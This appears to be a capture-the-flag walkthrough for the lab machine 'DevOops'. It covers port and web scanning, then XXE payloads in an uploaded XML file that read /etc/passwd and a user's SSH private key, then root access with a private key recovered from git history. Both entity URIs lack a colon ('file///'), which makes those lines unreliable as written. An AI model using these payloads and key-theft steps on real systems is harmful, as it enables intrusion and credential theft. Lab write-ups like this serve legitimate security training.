# Make the lab hostname resolve locally (appends to /etc/hosts, needs sudo).
printf '%s\n' '10.129.1.79  devoops.htb' | sudo tee -a /etc/hosts

# Aggressive full-port scan running the "vuln" NSE category; each script
# is capped by --script-timeout and --min-rate keeps the sweep fast.
nmap 10.129.1.79 -p- -A \
  --min-rate=10000 --script=vuln --script-timeout=15 \
  -oA devoops -v

# Default scripts plus service/version and OS detection on every TCP port.
nmap 10.129.1.79 -p- -sC -sV -O -oA devoops

# UDP sweep of every port (slow) with OS detection.
nmap 10.129.1.79 -sU -p- -O -oA devoops-udp

# Web server checks against the service on port 5000.
nikto -h 10.129.1.79:5000

# Directory brute force; no port is given, so this hits port 80 while the
# web service used elsewhere in this walkthrough is on 5000.
gobuster dir -u http://10.129.1.79/ \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -k -t 100

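# Working directory for the box. The original used `cd !$` (bash history
# expansion: last word of the previous command); that only works in an
# interactive shell and is off in scripts, so the name is repeated here.
mkdir Devoops || exit 1
cd Devoops || exit 1

# mkt: the author's own shell helper that lays out the working tree; it is
# not defined on this page, but the next line relies on it creating nmap/.
mkt
cd nmap || exit 1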

# Fast sweep of all TCP ports, reporting only open ones, no DNS lookups (-n).
nmap 10.129.1.79 -p- --open -T5 -n -v

# Same sweep again, this time kept in grepable format for extractPorts.
nmap 10.129.1.79 -p- --open -T5 -n -v -oG allPorts

Pasted image 20210814165109.png

# extractPorts: the author's helper (not shown here) that presumably pulls
# the open ports out of the grepable allPorts file.
extractPorts allPorts

# Targeted scan of the two ports found (22 and 5000): default scripts plus
# version detection, saved as normal output.
nmap 10.129.1.79 -p 22,5000 -sCV -oN targeted

Pasted image 20210814165333.png


# Fingerprint the web stack on port 5000.
whatweb 'http://10.129.1.79:5000'

Pasted image 20210814165439.png

# Enumerate common web paths on port 5000 with the http-enum NSE script.
nmap 10.129.1.79 -p 5000 --script http-enum -oN webScan

Pasted image 20210814165642.png

Nos dirigimos a http://10.129.1.79:5000

Pasted image 20210814165733.png

# Directory fuzzing on port 5000; 404 responses are hidden (--hc=404).
wfuzz -c --hc=404 -t 400 \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  'http://10.129.1.79:5000/FUZZ'

Pasted image 20210814171149.png

Vamos a upload y vemos que se puede subir un archivo XML.

Pasted image 20210814180136.png

<?xml version="1.0" encoding="ISO-8859-1"?>
<!-- XXE test document for the upload form: the DTD declares an external
     entity backed by a local file and the Author field expands it, so a
     server-side parser that resolves external entities returns the file
     contents in its response (see the screenshot below). Mitigation on
     the receiving side is to disable DTD processing / external entity
     resolution for user-supplied XML. -->
<!DOCTYPE foo
  [<!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file///etc/passwd" >]>
<elements>
  <Author>`&xxe;`</Author>
  <Subject>`mypass`</Subject>
  <Content>`mypass`</Content>
</elements>

Pasted image 20210814180811.png

<?xml version="1.0" encoding="ISO-8859-1"?>
<!-- Same XXE document, with the entity now pointing at roosa's SSH private
     key; the response (screenshot below) is what gets saved as id_rsa in
     the next step. The fix is the same: the application's XML parser must
     not resolve external entities from user input. -->
<!DOCTYPE foo
  [<!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file///home/roosa/.ssh/id_rsa" >]>
<elements>
  <Author>`&xxe;`</Author>
  <Subject>`mypass`</Subject>
  <Content>`mypass`</Content>
</elements>

Pasted image 20210814180942.png

Copiamos el contenido de id_rsa que obtuvimos y lo guardamos en un archivo id_rsa en nuestra máquina Kali.

# ssh refuses keys that are readable by others, so restrict the file first.
chmod 600 -- id_rsa

# Log in as roosa with the key recovered above.
ssh -i id_rsa roosa@10.129.1.79

Pasted image 20210814181256.png

Pasted image 20210814181847.png

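# List every file under the current directory, dropping paths that contain
# ".local". The original had no space after -v (grep received "-v\.\local"
# and rejected it as an invalid option) and omitted the start path, which
# only GNU find tolerates.
find . -type f 2>/dev/null | grep -v '\.local'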

Pasted image 20210814182338.png

Hacemos un `git log` y vemos el cambio.

Pasted image 20210814182230.png

Nos vamos al directorio work/blogfeed.

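# Print the contents of every authcredentials.key below the current
# directory. -exec replaces the "| xargs cat" pipeline so paths with
# spaces or other special characters are passed to cat intact, and the
# explicit start path works on non-GNU find as well.
find . -name authcredentials.key -exec cat -- {} +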

Pasted image 20210814182548.png

Copiamos lo que está en rojo y quitamos el `-` al comienzo de cada línea (es el prefijo que git pone a las líneas eliminadas en el diff). Lo guardamos en un archivo id_rsa.

Pasted image 20210814183556.png

# Log in as root with the key reconstructed from the git history.
ssh -i id_rsa root@10.129.1.79

Pasted image 20210814184056.png
